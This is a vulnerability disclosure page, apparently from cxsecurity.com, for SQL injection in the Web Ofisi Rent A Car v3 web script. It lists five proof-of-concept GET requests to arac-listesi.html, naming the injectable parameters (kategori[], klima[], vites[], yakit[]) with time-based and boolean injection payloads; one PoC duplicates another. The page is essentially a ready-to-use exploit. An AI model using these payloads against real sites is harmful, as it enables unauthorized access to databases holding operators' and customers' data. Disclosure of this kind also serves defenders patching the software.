Web Ofisi Rent A Car 3 SQL Injection

2019.07.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection # Date: 2019-07-19 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html # Demo Site: http://demobul.net/rentacarv3/ # Version: v3 # Tested on: Kali Linux # CVE: N/A ----- PoC 1: SQLi ----- Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: kategori[] (GET) Payload: if(now()=sysdate(),sleep(0),0) ----- PoC 2: SQLi ----- Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: klima[] (GET) Payload: 1 AND 3*2*1=6 AND 695=695 ----- PoC 3: SQLi ----- Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: vites[] (GET) Payload: 1 AND 3*2*1=6 AND 499=499 ----- PoC 4: SQLi ----- Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: vites[] (GET) Payload: 1 AND 3*2*1=6 AND 499=499 ----- PoC 5: SQLi ----- Request: http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 Vulnerable Parameter: yakit[] (GET) Payload: 1 AND 3*2*1=6 AND 602=602


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top